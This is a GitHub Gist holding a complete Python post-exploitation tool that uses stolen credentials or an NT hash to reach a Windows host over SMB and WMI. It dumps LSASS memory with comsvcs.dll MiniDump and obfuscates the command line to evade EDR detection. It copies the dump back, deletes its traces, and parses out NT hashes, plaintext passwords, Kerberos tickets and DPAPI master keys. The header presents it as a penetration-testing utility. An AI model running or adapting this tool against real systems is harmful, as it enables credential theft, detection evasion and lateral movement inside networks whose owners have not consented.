Last active
June 26, 2024 18:32
-
-
Save 3xocyte/276acf752f5d8ed96c6d87fd7dca0740 to your computer and use it in GitHub Desktop.
quickly dump creds from a box you've pwned while living off the land (feat. obfuscation and pypykatz automation)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import argparse | |
import sys | |
import logging | |
import random | |
import string | |
import os | |
from time import sleep | |
from impacket.examples import logger | |
from impacket.smbconnection import SMBConnection | |
from impacket import version | |
from impacket.dcerpc.v5.dtypes import NULL | |
from impacket.dcerpc.v5.dcom import wmi | |
from impacket.dcerpc.v5.dcomrt import DCOMConnection | |
from impacket.smbconnection import SMBConnection | |
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY | |
logger.init() | |
# TODO: | |
# * obfuscation functions need some TLC, currently it's possible (though uncommon) | |
# that they'll fail and the created directory needs to be cleaned up manually | |
# * pypykatz functionality is literally tacked on to the end, should be in their own | |
# functions | |
# * add some control over output directory | |
# OPSEC note: | |
# * command line obfuscation will only hide the command line argument that the cmd | |
# process created by Win32_Process.Create is launched with; the rundll32 process's | |
# command line argument property will still look dodgy, but it's the cmd process | |
# that will get the most attention anyway. This tool is for evading blocks on | |
# internal penetration tests, not red teaming in high security environments. | |
def randomise_case(randomise): | |
return ''.join(random.choice((x,y)) for x,y in zip(randomise.upper(), randomise.lower())) | |
# pretty buggy, needs better tracking for variable name reuse, and a whole refactor | |
# idea from https://github.com/danielbohannon/Invoke-DOSfuscation | |
def obfuscate_char_replace(command): | |
start = randomise_case('cmd /v:ON/c') | |
replace_chars = string.ascii_lowercase + string.digits | |
for c in command: | |
if c in replace_chars: | |
replace_chars = replace_chars.replace(c,'') | |
command_alphachar = ''.join(ch for ch in command if ch.isalnum()) | |
no_chars = random.randrange(2,len(replace_chars)) | |
var_len = random.randrange(2,10) | |
random_var = ''.join(random.choices(string.ascii_lowercase + string.digits, k=(var_len))) | |
here = '%s" %s %s=%s"' % (start, randomise_case("set"), random_var, command) | |
randomise_characters = [] | |
random_characters = [] | |
randomise_characters_dict = {} | |
final_random_var = ''.join(random.choices(string.ascii_lowercase + string.digits, k=(var_len))) | |
i = 0 | |
while i < no_chars: | |
random_var2 = ''.join(random.choices(string.ascii_lowercase+ string.digits, k=(var_len))) | |
replace_char = ''.join(random.choices(replace_chars, k=(1))) | |
string_char = ''.join(random.choices(command_alphachar, k=(1))) | |
if not replace_char in random_characters and not string_char in randomise_characters: | |
random_characters.append(replace_char) | |
randomise_characters.append(string_char) | |
assoc_dict = {} | |
assoc_dict[string_char] = replace_char | |
randomise_characters_dict[random_var2] = (assoc_dict) | |
i += 1 | |
convert_list = [] | |
call_list = [] | |
converted_command = '"%s %s=' % (randomise_case("set"), random_var) | |
track_reuse = [] | |
i = 0 | |
for k,v in randomise_characters_dict.items(): | |
for rsc, rc in v.items(): | |
# print("%s: %s" % (k, v)) | |
track_reuse.append(k) | |
if not k == track_reuse[i-1]: | |
convert = '&&%s %s=!%s:%s=%s!' % (randomise_case("set"), k, track_reuse[i-1], rc, rsc) | |
else: | |
convert = '&&%s %s=!%s:%s=%s!' % (randomise_case("set"), k, random_var, rc, rsc) | |
i += 1 | |
command = command.replace(rsc, rc) | |
# print(command +"\n") | |
convert_list.append(convert) | |
call = randomise_case("call") | |
call_list.append("&&" + call + " %" + k + '%"') | |
command = converted_command + command | |
for c in convert_list: | |
command +=c | |
command = start + command + call_list[-1] | |
return command | |
# kind of a mess but it's reliable >95% of the time | |
# idea from https://github.com/danielbohannon/Invoke-DOSfuscation | |
def obfuscate_concat(command): | |
command_length = len(command) | |
start = randomise_case('cmd /c"') | |
# maximum slice length | |
min_slice = int(command_length/random.randrange(8, 20)) | |
max_slice = int(command_length/random.randrange(5, 8)) | |
slice_dict = {} | |
i = 0 # index | |
c = 0 # count | |
remaining = command | |
random_vars = [] # for preventing variable name reuse | |
while c < command_length: | |
# attempt bugfix | |
random_var = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase, k=(random.randrange(2,5)))) | |
while random_var.upper() in random_vars: | |
random_var = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase, k=(random.randrange(2,5)))) | |
random_vars.append(random_var.upper()) | |
get_slice_length = random.randrange(min_slice, max_slice) | |
save_slice = remaining[:get_slice_length] | |
remaining = remaining[get_slice_length:] | |
var_dict = {} | |
var_dict[random_var] = save_slice | |
slice_dict[i]=var_dict | |
i += 1 | |
c += get_slice_length | |
dict_length = len(slice_dict) | |
keys = list(range(0, dict_length)) | |
random.shuffle(keys) | |
obfuscated_command = "" | |
for i in keys: | |
for k, v in slice_dict[i].items(): | |
call_var = "%s %s=%s&&" % (randomise_case("set"), k, v) | |
obfuscated_command += call_var | |
random_var = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.digits, k=(random.randrange(2,5)))) | |
obfuscated_command = obfuscated_command + randomise_case("call") + randomise_case(" set ") + random_var + "=" | |
reconstructed_command = '' | |
i = 0 | |
while i < dict_length: | |
for k,v in slice_dict[i].items(): | |
reconstructed_command += v | |
obfuscated_command += "%" + k + "%" | |
i += 1 | |
obfuscated_command += "&&" +randomise_case("call")+" %" + random_var + "%" | |
obfuscated = start + obfuscated_command + '"' | |
return obfuscated | |
def create_directory(smb_client, share): | |
dir_name = ''.join(random.choices(string.ascii_lowercase, k=random.randrange(3,6))) | |
smb_client.createDirectory(share, dir_name) | |
logging.debug("created directory: %s on %s" % (dir_name, share)) | |
return dir_name | |
def execute_dump(dcom, namespace, dir_name, obfs_concat=False, obfs_replace=False): | |
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login) | |
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) | |
iWbemServices= iWbemLevel1Login.NTLMLogin(namespace, NULL, NULL) | |
iWbemLevel1Login.RemRelease() | |
logging.info("created WMI session with provided credentials") | |
# first we get LSASS's pid using WQL | |
iEnumWbemClassObject = iWbemServices.ExecQuery('SELECT ProcessId From Win32_Process WHERE Name = "lsass.exe"') | |
pEnum = iEnumWbemClassObject.Next(0xffffffff,1)[0] | |
lsass_pid = pEnum.ProcessId | |
iEnumWbemClassObject.RemRelease() | |
logging.debug("found lsass PID: %s" % lsass_pid) | |
# now we build the command | |
directory = "C:\\%s\\" % dir_name | |
dump_name = ''.join(random.choices(string.ascii_lowercase, k=random.randrange(3,6))) | |
dump_location = directory + dump_name | |
comsvcs_command = "rundll32.exe c:\windows\system32\comsvcs.dll" | |
full = "full" | |
prep_command = "%s, MiniDump %s %s %s" % (comsvcs_command, lsass_pid, dump_location, full) | |
logging.debug("command: %s" % prep_command) | |
if obfs_concat == True: | |
command = obfuscate_concat(prep_command) | |
# keep trying until likely EDR triggers aren't in the command | |
while "Mini" in command or "Dump" in command or "full" in command: | |
command = obfuscate_concat(prep_command) | |
logging.debug("obfuscated command: %s" % command) | |
elif obfs_replace == True: | |
command = obfuscate_char_replace(prep_command) | |
# keep trying until likely EDR triggers aren't in the command | |
while "Mini" in command or "Dump" in command or "full" in command: | |
command = obfuscate_char_replace(prep_command) | |
logging.debug("obfuscated command: %s" % command) | |
else: | |
command = prep_command | |
logging.info("executing: %s" % command) | |
# create the process | |
win32Process,_ = iWbemServices.GetObject("Win32_Process") | |
win32Process.Create(command, "C:\\", None) | |
win32Process.RemRelease() | |
iWbemServices.RemRelease() | |
return dump_name | |
def get_dump(smb_client, target, share, dir_name, dump_name): | |
dump_file = "%s\\%s" % (dir_name, dump_name) | |
minidump_out = "%s_dump/lsass.dmp" % target | |
fh = open(minidump_out,'wb') | |
while True: | |
try: | |
smb_client.getFile(share, dump_file, fh.write) | |
logging.info("got dump file: %s" % minidump_out) | |
fh.close() | |
break | |
except Exception as e: | |
logging.debug("failed to get %s, retrying..." % dump_file) | |
sleep(1) | |
return minidump_out | |
def clean_filesystem(smb_client, share, dir_name, dump_name): | |
try: | |
dump_file = "%s\\%s" % (dir_name, dump_name) | |
smb_client.deleteFile(share, dump_file) | |
logging.debug("deleted %s" % dump_file) | |
smb_client.deleteDirectory(share, dir_name) | |
logging.debug("removed %s" % dir_name) | |
return True | |
except Exception as e: | |
logging.debug(e) | |
return False | |
def main(): | |
parser = argparse.ArgumentParser(add_help = True, description = "auto lsass dumping post-exploitation utility (by @3xocyte)") | |
parser.add_argument('-u', '--username', action="store", default='', help='valid username') | |
parser.add_argument('-p', '--password', action="store", default='', help='valid password') | |
parser.add_argument('-d', '--domain', action="store", default='', help='valid domain name') | |
parser.add_argument('--nt', action="store", default='', help='nt hash') | |
obfuscation_group = parser.add_mutually_exclusive_group() | |
obfuscation_group.add_argument('--obfs-concat', action="store_true", default="False", help='obfuscate dump command with variable concacenation (experimental!)') | |
obfuscation_group.add_argument('--obfs-char-replace', action="store_true", default="False", help='obfuscate dump command with environment variable char replacement (experimental!)') | |
parser.add_argument('--debug', action="store_true", help='debug mode (very verbose!)') | |
parser.add_argument('--parse', action="store_true", default=False, help='get pypykatz raw output, json output, and kerberos tickets, also try to display some unique creds') | |
parser.add_argument('--dpapi', action="store_true", default=False, help='when using pypykatz, try to display unique dpapi keys') | |
parser.add_argument('target', help='ip address or hostname of target') | |
if len(sys.argv) == 1: | |
parser.print_help() | |
print("\nrequires python3, the impacket and pypykatz packages installed") | |
print("\nexamples: ") | |
print("\nget an lsass minidump from a single target") | |
print("\t./lazykatz.py -d <domain> -u <username> -p '<password>' 192.168.1.12") | |
print("\nget an lsass minidump from a single target and quickly parse it for creds") | |
print("\t./lazykatz.py -d <domain> -u <username> -p '<password>' --parse 192.168.1.12\n") | |
print("\nuse obfuscation with concatenation to get an lsass minidump from a single target, and quickly parse it for creds") | |
print("\t./lazykatz.py -d <domain> -u <username> -p '<password>' --parse --obfs-concat 192.168.1.12\n") | |
print("\nuse obfuscation with character replacement to get an lsass minidump from a single target") | |
print("\t./lazykatz.py -d <domain> -u <username> -p '<password>' --obfs-char-replace 192.168.1.12\n") | |
sys.exit(0) | |
options = parser.parse_args() | |
if options.debug is True: | |
logging.getLogger().setLevel(logging.DEBUG) | |
else: | |
logging.getLogger().setLevel(logging.INFO) | |
domain = options.domain | |
username = options.username | |
password = options.password | |
address = options.target | |
obfs_concat = options.obfs_concat | |
obfs_replace = options.obfs_char_replace | |
if options.nt: | |
nthash = options.nt | |
lmhash = '0' | |
else: | |
nthash = '' | |
lmhash = '' | |
share = "C$" | |
try: | |
os.mkdir('./%s_dump' % address) | |
logging.debug('created directory: ./%s_dump' % address) | |
except FileExistsError as e: | |
logging.debug('directory exists') | |
pass | |
except Exception as e: | |
logging.debug('directory creation error: %s' % e) | |
sys.exit(1) | |
try: | |
smb_client = SMBConnection(address, address) | |
smb_client.login(username, password, domain, lmhash, nthash) | |
except Exception as e: | |
logging.info("login failed") | |
logging.debug('login error: %s' % e) | |
sys.exit(1) | |
try: | |
smb_client.connectTree(share) | |
logging.info("connected to %s using provided credentials" % share) | |
except Exception as e: | |
import traceback | |
traceback.print_exc() | |
logging.info("failed to connect to %s" % share) | |
logging.debug(e) | |
sys.exit(1) | |
directory = create_directory(smb_client, share) | |
dcom = DCOMConnection(address, username, password, domain, lmhash, nthash) | |
namespace = '//%s/root/cimv2' % address | |
if obfs_concat == True: | |
dump = execute_dump(dcom, namespace, directory, obfs_concat = True) | |
elif obfs_replace == True: | |
dump = execute_dump(dcom, namespace, directory, obfs_replace = True) | |
else: | |
dump = execute_dump(dcom, namespace, directory) | |
dcom.disconnect() | |
dump_output = get_dump(smb_client, address, share, directory, dump) | |
if clean_filesystem(smb_client, share, directory, dump): | |
logging.info("finished filesystem cleanup") | |
smb_client.close() | |
logging.info("connections closed") | |
# pypykatz stuff, should go into its own function | |
if options.parse: | |
logging.info("quickly parsing dump file") | |
try: | |
from pypykatz.pypykatz import pypykatz | |
from pypykatz.commons.common import UniversalEncoder | |
import json | |
except: | |
logging.error("unable to import pypykatz, try 'sudo pip3 install pypykatz'") | |
sys.exit(1) | |
results = {} | |
try: | |
os.mkdir('./%s_dump/kirbi' % address) | |
logging.debug('created directory: ./%s_dump' % address) | |
except FileExistsError as e: | |
logging.debug('directory exists') | |
pass | |
mimi = pypykatz.parse_minidump_file(dump_output) | |
mimi.kerberos_ccache.to_kirbidir('./%s_dump/kirbi' % address) | |
logging.debug('dumped kirbi tickets to directory ./%s_dump/kirbi' % address) | |
out_txt_file = open('./%s_dump/pypykatz.txt' % address, 'a') | |
for k,v in mimi.to_dict()['logon_sessions'].items(): | |
out_txt_file.write('%s' % v) | |
for c in mimi.to_dict()['orphaned_creds']: # what about orphaned sessions? requires testing | |
out_txt_file.write('%s' % c) | |
out_txt_file.close() | |
logging.debug('wrote raw pypykatz output to ./%s_dump/pypykatz.txt' % address) | |
mimi_json = json.dumps(mimi, cls = UniversalEncoder, sort_keys=True) | |
out_json_file = open('./%s_dump/pypykatz.json' % address, 'w') | |
out_json_file.write(mimi_json) | |
out_json_file.close() | |
logging.debug('wrote json output to ./%s_dump/pypykatz.json' % address) | |
results_json = json.loads(mimi_json) | |
pwned_msv = [] | |
pwned_wdigest = [] | |
pwned_dpapi = [] | |
for session in results_json['logon_sessions']: | |
user = results_json['logon_sessions'][session]['username'] | |
if user: | |
try: | |
msv = results_json['logon_sessions'][session]['msv_creds'][0] | |
if msv not in pwned_msv: | |
if msv['NThash']: | |
print() | |
print('[MSV]') | |
print("{: <20}{}".format("domain", msv['domainname'])) | |
print("{: <20}{}".format("username", msv['username'])) | |
print("{: <20}{}".format("nt hash", msv['NThash'])) | |
print("{: <20}{}".format("sha1 hash", msv['SHAHash'])) | |
pwned_msv.append(msv) | |
except: | |
pass | |
try: | |
wdigest = results_json['logon_sessions'][session]['msv_creds'][0] | |
if wdigest not in pwned_wdigest: | |
if wdigest['password']: | |
print() | |
print('[WDigest]') | |
print("{: <20}{}".format("domain", wdigest['domainname'])) | |
print("{: <20}{}".format("username", wdigest['username'])) | |
print("{: <20}{}".format("password", wdigest['password'])) | |
pwned_wdigest.append(wdigest) | |
except: | |
pass | |
if options.dpapi: | |
try: | |
dpapi = results_json['logon_sessions'][session]['dpapi_creds'] | |
if dpapi not in pwned_dpapi: | |
print() | |
print('[DPAPI]') | |
for cred in dpapi: | |
print("{: <20}{}".format("username", user)) | |
print("{: <20}{}".format("key guid", cred['key_guid'])) | |
print("{: <20}{}".format("masterkey", cred['masterkey'])) | |
print("{: <20}{}".format("sha1 masterkey", cred['sha1_masterkey'])) | |
pwned_dpapi.append(dpapi) | |
except: | |
pass | |
else: | |
sys.exit() | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This script depended on the then-current version of pypykatz, which has since had breaking changes.